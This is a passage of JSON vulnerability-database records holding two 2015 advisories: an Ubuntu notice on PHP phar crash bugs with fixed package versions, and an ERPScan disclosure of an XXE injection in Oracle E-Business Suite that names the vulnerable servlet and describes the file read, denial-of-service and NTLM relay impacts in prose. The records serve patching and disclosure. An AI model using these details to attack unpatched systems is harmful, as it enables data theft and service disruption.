LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "94aee96d0a33ff770af1ab8e308073f0"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "7591a4414fab4e00d545d96f67923bfe"}, {"key": "href", "hash": "91f326dd520bc78a7e8becd3c39b6be5"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "29738b7846c783fb3a4f2a49b7c4ccd3"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "d2381bcd69ce89f633080a3b3bcd22d9c6038a3c2512d85530ef0a4ad6a45bd8", "viewCount": 181, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "f5", "idList": ["F5:K17503", "SOL17503"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-7803", "UB:CVE-2015-7804"]}, {"type": "cve", "idList": ["CVE-2015-7803", "CVE-2015-7804"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191984", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310806649", "OPENVAS:1361412562310120520", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562310703380", "OPENVAS:703380", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562310807000", "OPENVAS:1361412562310806648", "OPENVAS:1361412562310120396", "OPENVAS:1361412562310842508"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-602.NASL", "DEBIAN_DSA-3380.NASL", "EULEROS_SA-2019-2649.NASL", "PHP_5_5_30.NASL", "UBUNTU_USN-2786-1.NASL", "OPENSUSE-2016-100.NASL", "SUSE_SU-2016-1581-1.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "OPENSUSE-2016-157.NASL", "EULEROS_SA-2019-1984.NASL", "MACOSX_SECUPD2015-008.NASL", "9325.PRM", "SLACKWARE_SSA_2016-034-04.NASL", "EULEROS_SA-2019-2438.NASL", "SUSE_SU-2016-1638-1.NASL", "WEB_APPLICATION_SCANNING_98806", "GENTOO_GLSA-201606-10.NASL", "8956.PRM", "SUSE_SU-2016-0284-1.NASL", "MACOSX_10_11_2.NASL", "SUSE_SU-2016-1145-1.NASL", "PHP_5_6_14.NASL", "DEBIAN_DLA-341.NASL", "ALA_ALAS-2015-601.NASL", "PFSENSE_SA-15_08.NASL", "EULEROS_SA-2020-1747.NASL"]}, {"type": "ubuntu", "idList": ["USN-2786-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14753"]}, {"type": "freebsd", "idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"]}, {"type": "slackware", "idList": ["SSA-2016-034-04"]}, {"type": "hackerone", "idList": ["H1:104008", "H1:103990"]}, {"type": "amazon", "idList": ["ALAS-2015-602", "ALAS-2015-601"]}, {"type": "redhat", "idList": ["RHSA-2016:0457"]}, {"type": "suse", "idList": ["SUSE-SU-2016:1581-1", "SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1"]}, {"type": "gentoo", "idList": ["GLSA-201606-10"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32654", "bulletinFamily": "software", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-4849"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "05f33ecfa6c5da775ada7be0946e9c35"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "e069b6a0eb846de58d51f6f1caccd76e"}, {"key": "href", "hash": "a034a18d00b9b8f4a3448812c0519f69"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "c9c62536a7dbd3fac9ecbf649050cab1"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "c4015e5d0067bf08940e133c4477451e433581d60a4c9b7745f8b69fced90c4c", "viewCount": 168, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-4849"]}, {"type": "erpscan", "idList": ["ERPSCAN-15-029"]}, {"type": "nessus", "idList": ["ORACLE_E-BUSINESS_CPU_OCT_2015.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14755"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2015-2367953", "ORACLE:CPUOCT2015"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}]}
